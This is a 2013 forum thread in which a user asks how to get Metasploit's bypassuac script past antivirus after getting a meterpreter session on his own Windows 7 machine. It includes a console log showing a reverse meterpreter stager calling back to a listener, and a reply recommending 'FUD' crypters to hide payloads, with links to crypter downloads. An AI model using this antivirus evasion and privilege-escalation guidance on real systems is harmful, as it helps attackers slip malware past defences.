SystemCrash86 Posted March 20, 2013 Share Posted March 20, 2013 I was using SET and I can get a meterpreter session easy on my Desktop running windows 7 with up-to-date Microsoft Security Essentials thanks to the new and improved multi powershell attack on multiple port. When I go to the cloned webpage I get the java applet like normal and I am not notified by my antivirus that there is a problem. Great. If I understand correctly it goes straight into memory never touching disk right? Now once I have a meterpreter session the next thing I try to do is escalate my privileges and running “get system” does not work so I use the script that Dave Kennedy and Kevin Mitnick made to bypass uac, but whenever I do it is automatically caught by my antivirus. How is it possible to get this to work? I already have a meterpreter session. I try to search on Google for an answer and all I get is videos of bypassuac tutorials - all of which work flawlessly so I cant explain why my antivirus catches it when I can get a meterpreter session. When getting a meterpreter and running bypassuac this is what I get as my desktop pc Microsoft security essentials detects it: msf exploit(handler) > sessions -i 2 [*] Starting interaction with 2... meterpreter > getsystem [-] priv_elevate_getsystem: Operation failed: Access is denied. meterpreter > run bypassuac [*] Creating a reverse meterpreter stager: LHOST=192.168.1.71 LPORT=4546 [*] Running payload handler [*] Uploading Windows UACBypass to victim machine. [*] Bypassing UAC Restrictions on the system.... [*] Meterpreter stager executable 73802 bytes long [*] Uploaded the agent to the filesystem.... [*] Executing the agent with endpoint 192.168.1.71:4546 with UACBypass in effect... [*] C:\Users\CHRIST~1\AppData\Local\Temp\wHOFsw.exe /c %TEMP%\FJElQacDvdzS.exe meterpreter > use post/windows/escalate/bypassuac Loading extension post/windows/escalate/bypassuac... [-] Failed to load extension: No such file or directory -/opt/metasploit/msf3/data/meterpreter/ext_server_post/windows/escalate/bypassuac.dll meterpreter > I emailed Dave Kennedy and this is what he told me I have to do: “You need to obfuscate the executables that it drops. They are in the Metasploit repositories and are dll's. Just need to randomize / pack / crypt them to get around AV..” However I am not sure what files he means, I have tried looking but so far I have been unable to locate them. Dave says I should be looking for dll’s in the metasploit repositories but I looked but cant find them or even sure if they are the right ones. I am using Backtrack 5r3. (Not yet made the switch to Kali yet) I am very confused and I am hoping that you guys could take the time to help me. All help is greatly appreciated. Since Dave is a very busy man working extremely hard I wouldn’t want to waste his time that’s why I am posting this on the forums to see if anyone can help. Quote Link to comment Share on other sites More sharing options...
ApacheTech Consultancy Posted March 20, 2013 Share Posted March 20, 2013 (edited) He means you need to make the applications FUD (Fully Undetectable) by Crypting it. Usually this means creating a self expanding "stub" and wrapping the rest of the file bytes around it. There are thousands of crypters available on the internet. Some you pay for, other don't work. Here is an example: http://thehackersarmy.blogspot.co.uk/2012/01/fud-crypter-free-download-bypass.html There's also a guide on how to build them yourself here: http://www.cryptersource.com/ Edited March 20, 2013 by ApacheTech Consultancy Quote Link to comment Share on other sites More sharing options...
SystemCrash86 Posted March 20, 2013 Author Share Posted March 20, 2013 (edited) He means you need to make the applications FUD (Fully Undetectable) by Crypting it. Usually this means creating a self expanding "stub" and wrapping the rest of the file bytes around it. There are thousands of crypters available on the internet. Some you pay for, other don't work. Here is an example: http://thehackersarmy.blogspot.co.uk/2012/01/fud-crypter-free-download-bypass.html There's also a guide on how to build them yourself here: http://www.cryptersource.com/ Oh no i fully understand that, i know exactly how to crypt applications as i've done that before. What i mean was where are the files he was referring to that i need to crypt in order for meterpreters bypassuac script to bypass antivirus or did he want me to actually crypt the bypassuac script itself? I get a meterpreter session but when using bypassuac to escalate my privilages the bypassuac script keeps getting detected by my antivirus Edited March 20, 2013 by SystemCrash86 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.